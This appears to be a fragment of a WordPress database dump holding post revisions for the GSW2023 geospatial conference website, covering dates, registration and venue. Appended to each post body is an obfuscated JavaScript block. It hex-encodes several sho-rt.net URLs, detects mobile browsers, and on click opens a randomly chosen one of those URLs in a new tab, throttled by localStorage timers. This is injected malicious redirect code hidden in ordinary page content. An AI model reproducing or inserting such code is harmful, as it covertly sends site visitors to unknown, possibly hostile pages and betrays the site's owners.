_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-03-30 04:17:18','2023-03-30 04:17:18','',2654,'https://gsw2023.com/?p=3966',0,'revision','',0),
(3967,1,'2023-03-30 05:19:20','2023-03-30 05:19:20','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Submission of Abstracts and Full Paper is Now Open</h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-03-30 05:19:20','2023-03-30 05:19:20','',3066,'https://gsw2023.com/?p=3967',0,'revision','',0),
